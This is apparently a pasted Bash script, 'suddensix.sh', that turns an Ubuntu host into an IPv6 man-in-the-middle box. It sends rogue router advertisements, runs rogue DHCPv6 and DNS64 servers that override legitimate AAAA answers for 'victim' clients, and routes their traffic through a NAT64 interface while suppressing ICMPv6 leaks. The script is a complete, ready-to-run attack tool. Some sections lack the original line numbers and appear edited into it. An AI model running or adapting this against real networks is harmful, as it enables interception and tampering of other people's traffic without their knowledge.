opexxx

suddensix.sh

Jun 5th, 2014
  1. #!/bin/bash
  2. PATH="/usr/bin:/usr/sbin:/bin:/sbin"
  3. #
  4. # IPv6 MITM Setup Script
  5. # This script will install dependencies and configure the system for IPv6 infrastructure
  6. # Written for plain Ubuntu 12.04 LTS, might work on Debian 6 or Kali with minor adjustments
  7. # Run me as root!
  8.  
  9. #GLOBALS
  10. #TAYGAINTERFACE default name for the Tayga virtual interface
  11. TAYGAINTERFACE="nat64"
  12. #DEFAULT6PREFIX default IPv6 prefix to present, we're assuming the reserved 64:FF9B::/96
  13. #If you use this as a variable you must end it appropriately by adding the necessary colons or full expansion (i.e. 64:FF9B::1)
  14. DEFAULT6PREFIX="2001:db8:1:"
  15. DEFAULT6CIDR="96"
  16. #DEFAULT64MAPPREFIX default IPv6 prefix to map the IPv4 responses into, it must be in the defined prefix. This will be added as a route to the tayga interface.
  17. TAYGA64MAPPREFIX="${DEFAULT6PREFIX}FFFF::/96"
  18. #DIP6 IPv6 address and CIDR to assign to DINTERFACE
  19. #THIS WILL ALSO BE USED/ADVERTISED AS THE DNS6 SERVER ADDRESS
  20. DIP6="${DEFAULT6PREFIX}:2" #i.e. 64:FF9B::2
  21. #Advertised SLAAC routing will also use this cidr
  22. DIP6CIDR="64"
  23. #i.e. ${DIP6}/${DIP6CIDR} = 64:FF9B::2/64
  24. #DHCPv6 range
  25. DHCPV6START="${DEFAULT6PREFIX}CAFE::10" #i.e. 64:FF9B::CAFE:10
  26. DHCPV6END="${DEFAULT6PREFIX}CAFE::0240" #i.e. 64:FF9B::CAFE:0240
  27. DHCPV6DOMAIN="localdomain6"
  28. #TAYGA6IP IPv6 address to be assigned to the tayga virtual interface for the 6-side of NATting
  29. TAYGA6IP="${DEFAULT6PREFIX}:3" #i.e. 64:FF9B::3
  30.  
  31. #TAYGA4SUBNET default IPv4 /24 subnet for tayga to NAT traffic through. This will only be used on the nat64 interface but should NOT be a network that is in use.
  32. TAYGA4SUBNET="192.168.255.0/24"
  33. #TAYGA4IP default IPv4 address for tayga virtual interface, it should be within TAYGA4SUBNET
  34. TAYGA4IP="192.168.255.1"
  35. #DINTERFACE interface to listen on, defaulted here but we'll prompt for it
  36. DINTERFACE="eth0"
  37. #DSECONDIP second "Legitimate" IPv4 address to prompt for, assuming an actual DHCPv4 lease is the first. This will be assigned to the tayga nat64 interface for NAT-ing
  38. DSECONDIP=""
  39. #NAMESERVERS existing IPv4 DNS servers, this should be replaced with the internal DNSv4 servers from DHCP
  40. #If we get a blank we'll fall back to google
  41. #BINDFORWARDERS="8.8.8.8;"
  42. DEFAULTNAMESERVERS="8.8.8.8"
  43.  
  44. ##CONFIG FILE LOCATIONS
  45. #wide-dhcpv6-server
  46. PATHDEFDHCP6CONF="/etc/default/wide-dhcpv6-server"
  47. PATHDHCP6CONF="/etc/wide-dhcpv6/dhcp6s.conf"
  48. #tayga
  49. PATHTAYGACONF="/etc/tayga.conf"
  50. #radvd
  51. PATHRADVDCONF="/etc/radvd.conf"
  52. #bind9 options
  53. PATHNAMEDOPTIONSCONF="/etc/bind/named.conf.options"
  54.  
  55. #INSTALLEDLIST list of installed Debian packages
  56. INSTALLEDLIST=""
  57.  
  58. #FUNCTIONS
  59. #Sets up the system for IPv6
  60. function loadIPv6Module {
  61.     /sbin/modprobe ipv6
  62.     # persist this with
  63.     #echo 'ipv6' >> /etc/modules
  64. }
  65. #Sets up the system for forwarding
  66. function enableForwarding {
  67.     echo 1 > /proc/sys/net/ipv4/ip_forward
  68.     echo 1 > /proc/sys/net/ipv6/conf/all/forwarding
  69.     #persist these in /etc/sysctl.conf
  70. }
  71.  
  72. #Remove all the iptables rules
  73. function clearIpTables {  
  74.     /sbin/iptables -F
  75.     /sbin/iptables -X
  76.     /sbin/ip6tables -F
  77.     /sbin/ip6tables -X
  78. }
  79. #Set up the 6-4 forwarding between your interface and the tayga virtual interface
  80. function setIpTablesForwarding {
  81.     # Set up iptables nat64
  82.     /sbin/iptables -I FORWARD -j ACCEPT -i $TAYGAINTERFACE -o $DINTERFACE
  83.     /sbin/iptables -I FORWARD -j ACCEPT -i $DINTERFACE -o $TAYGAINTERFACE -m state --state RELATED,ESTABLISHED
  84.     /sbin/iptables -t nat -I POSTROUTING -o $DINTERFACE -j MASQUERADE
  85.     #this never worked /sbin/iptables -I FORWARD  -j LOG --log-prefix "IPTables forward: "
  86.     #Drop destination unreachable messages for when we have leaks of legit ipv6 addresses, i.e. from the legit dhcpv4 server
  87.     /sbin/ip6tables -A OUTPUT -p icmpv6 --icmpv6-type 1 -j DROP
  88. }
  89. #Config file creation functions
  90. #use the EOF sentinal style for long config file
  91. # do NOT quote EOF ("EOF"), let bash expand variables here
  92.  
  93. #Creates /etc/default/wide-dhcpv6-server and /etc/wide-dhcpv6/dhcp6s.conf
  94. function setWideDhcp6Conf {
  95.     #Make active dhcpv6 on your interface (Debian)
  96.     echo "INTERFACES=${DINTERFACE}" > $PATHDEFDHCP6CONF
  97.     echo "Writing to $PATHDEFDHCP6CONF"
  98.     #Now the actual config
  99. read -d '' DHCP6CONF << EOF
  100. option domain-name-servers ${DIP6};
  101. option domain-name "${DHCPV6DOMAIN}";
  102. interface ${DINTERFACE} {
  103.     address-pool pool1 3600;
  104. };
  105. pool pool1 {
  106.     range ${DHCPV6START} to ${DHCPV6END};
  107. };
  108. EOF
  109.     echo "${DHCP6CONF}" > ${PATHDHCP6CONF}
  110.     echo "Writing to $PATHDHCP6CONF"
  111. }
  112. #Creates /etc/tayga.conf
  113. function setTaygaConf {
  114. read -d '' TAYGACONF << EOF
  115. tun-device ${TAYGAINTERFACE}
  116. ipv4-addr ${TAYGA4IP}
  117. prefix  ${TAYGA64MAPPREFIX}
  118. dynamic-pool ${TAYGA4SUBNET}
  119. EOF
  120.     echo "${TAYGACONF}" > $PATHTAYGACONF
  121.     echo "Writing to $PATHTAYGACONF"
  122. }
  123. #Creates /etc/radvd.conf
  124. function setRADvdConf {
  125. #use the EOF sentinal style for long config file
  126. read -d '' RADVDCONF << EOF
  127. interface ${DINTERFACE}
  128. {
  129.     AdvSendAdvert on;
  130.     MinRtrAdvInterval 3;
  131.     MaxRtrAdvInterval 10;
  132.     AdvHomeAgentFlag off;
  133.     #Clients should query our DHCPv6 server for other stuff (i.e. DNS) needed for Win7/Win8
  134.     AdvOtherConfigFlag on;
  135.     #desired slaac
  136.     prefix ${DEFAULT6PREFIX}:/${DIP6CIDR}
  137.     {
  138.         AdvOnLink on;
  139.         AdvAutonomous on;
  140.         AdvRouterAddr off;
  141.     };
  142.     #Advertise our IPv6 address as DNS server. This is ignored by Win7+
  143.     RDNSS ${DIP6}
  144.     {
  145.         AdvRDNSSLifetime 30;
  146.     };
  147. };
  148. EOF
  149.  
  150.     echo "${RADVDCONF}" > $PATHRADVDCONF
  151.     echo "Writing to $PATHRADVDCONF"
  152. }
  153. #Creates /etc/bind/named.conf.options
  154. function setBind9Options {
  155.     #populate BINDFORWARDERS
  156.     getNameServers
  157. read -d '' NAMEDCONF << EOF
  158. options {
  159.     directory "/var/cache/bind";
  160.     forwarders {
  161.         #The actual client DNS servers here, don't use the root fallback
  162.         #GRAB THESE FROM /etc/resolv.conf from dhcp?
  163.         ${BINDFORWARDERS}
  164.     };
  165.     dnssec-validation auto;
  166.     auth-nxdomain no;
  167.     listen-on-v6 { any; };
  168.     allow-query { any; };
  169.     #bind9 standard - compatible mapping
  170.     dns64 ${TAYGA64MAPPREFIX} {
  171.         #todo lock this down to just our victim ipv6 prefixes
  172.         clients { any; };
  173.         #Disregard all legit AAAA responses, always return our prefixed A responses for AAAA
  174.         exclude { any; };
  175.     };
  176. };
  177. EOF
  178.     echo "${NAMEDCONF}" > ${PATHNAMEDOPTIONSCONF}
  179.     echo "Writing to ${PATHNAMEDOPTIONSCONF}"
  180. }
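#extracts nameservers from /etc/resolv.conf
#Rebuilds BINDFORWARDERS from scratch on every call, one "address;" per line as
#named.conf expects. DEFAULTNAMESERVERS is used when resolv.conf is missing,
#unreadable or lists no nameserver.
#Globals: DEFAULTNAMESERVERS (read), BINDFORWARDERS (written)
function getNameServers {
    local NAMESERVERS=""
    local server
    if [ -r "/etc/resolv.conf" ]; then
        NAMESERVERS=$(/usr/bin/awk '$1 == "nameserver" {print $2}' /etc/resolv.conf)
    fi
    if [ -z "$NAMESERVERS" ] ; then
        NAMESERVERS="$DEFAULTNAMESERVERS"
    fi
    #start empty so a second call does not append duplicates
    BINDFORWARDERS=""
    #suffix the values with a semicolon for named.conf
    #NAMESERVERS is left unquoted on purpose: one word per address
    for server in $NAMESERVERS; do
        BINDFORWARDERS+="${server};"$'\n'
    done
}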
  195. #Get list of installed packages for checking
  196. function getInstalledDpkg {
  197.     INSTALLEDLIST=`/usr/bin/dpkg --get-selections | grep install | awk '{print $1}'`
  198. }
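#Find out if a package is installed, takes a string argument for package name
#The name must equal a whole entry of INSTALLEDLIST (an ":arch" suffix on the
#entry is ignored), so "bind" does not match "bind9".
#Globals:   INSTALLEDLIST (read), one package per line
#Arguments: $1 - package name
#Outputs:   nothing
#Returns:   0 if the package is listed, 1 otherwise
function isPkgInstalled {
    local search_str="$1"
    local pkg
    [ -n "$search_str" ] || return 1
    while IFS= read -r pkg; do
        if [ "$pkg" = "$search_str" ] || [ "${pkg%%:*}" = "$search_str" ]; then
            return 0
        fi
    done <<< "$INSTALLEDLIST"
    return 1
}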
  208. #Install packages, these should all be in the standard Ubuntu repos
  209. function installPrereqDpkgs {
  210.     /usr/bin/apt-get install -y sipcalc tayga radvd wide-dhcpv6-server bind9 iptables
  211. }
  212. #Set up Taya interface, IP addresses and routes, and and start Tayga
  213. function startTayga {
  214.     # Set up interfaces
  215.     ip addr add "${DIP6}/${DIP6CIDR}" dev $DINTERFACE
  216.     #makes nat64 interface according to tayga.conf
  217.     /usr/sbin/tayga --mktun
  218.     ip link set $TAYGAINTERFACE up
  219.    
  220.     ip addr add $DSECONDIP dev $TAYGAINTERFACE
  221.     ip addr add $TAYGA4IP dev $TAYGAINTERFACE
  222.     ip route add $TAYGA4SUBNET dev $TAYGAINTERFACE
  223.  
  224.     ip addr add $TAYGA6IP dev $TAYGAINTERFACE
  225.     ip route add $TAYGA64MAPPREFIX dev $TAYGAINTERFACE
  226.     #Now run tayga as a daemon
  227.     /usr/sbin/tayga && ( echo "tayga should now be running as a daemon"; return 0 )
  228. }
  229. function stopTayga {
  230.     ip link set $TAYGAINTERFACE down
  231.     /usr/sbin/tayga --rmtun
  232. }
  233.  
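#EXECUTION

#Everything below edits files under /etc, loads a kernel module and changes
#netfilter rules, so stop here instead of failing half way through.
if [ "$(id -u)" -ne 0 ]; then
    echo "This script must be run as root." >&2
    exit 1
fi

#Precondition: only continue on a host that has no working IPv6 path yet.
#The exit has to run in this shell; inside ( ... ) it only ends the subshell
#and the script carries on.
if /bin/ping6 -c 3 google.com; then
    echo "I am able to IPv6 ping google.com already, bailing out."
    exit 0
fi


#Kind of mindless for now just install the packages we need first
echo "Welcome, I'll install a few packages and ask a couple of questions first"
installPrereqDpkgs
# Prompt for network interface to use
DEFAULTINTERFACE="$DINTERFACE"
read -r -p "Please enter the interface name to listen on (default ${DEFAULTINTERFACE}): " DINTERFACE
#An empty answer keeps the default instead of blanking the variable
DINTERFACE="${DINTERFACE:-$DEFAULTINTERFACE}"
#The name is written into config files and passed to commands run as root
case "$DINTERFACE" in
    *[!A-Za-z0-9_.-]*)
        echo "Invalid interface name: ${DINTERFACE}" >&2
        exit 1
        ;;
esac
echo "This is your current address information: "
sipcalc "$DINTERFACE"
# Prompt for second IP on the subnet
read -r -p "Please enter an additional available IPv4 address in this range: " DSECONDIP
#Dotted quad, optionally followed by /prefix-length
if ! [[ "$DSECONDIP" =~ ^[0-9]{1,3}(\.[0-9]{1,3}){3}(/[0-9]{1,2})?$ ]]; then
    echo "Invalid IPv4 address: ${DSECONDIP}" >&2
    exit 1
fi
#Configure these system parameters in a non-persistent way for now
loadIPv6Module
enableForwarding

clearIpTables
stopTayga

setBind9Options
setRADvdConf
setWideDhcp6Conf
setTaygaConf
#Most of the non-persistent configuration is in startTayga
if startTayga; then
    sleep 5
    #Restart our daemons they need to know our addresses
    #TODO: check if we need to enable them
    service radvd stop
    sleep 3
    service radvd start
    service bind9 restart
    service wide-dhcpv6-server restart
    #More non-persistent configuration
    setIpTablesForwarding

    echo "I'm ready."
else
    echo "Failed to start NAT64"
    exit 1
fi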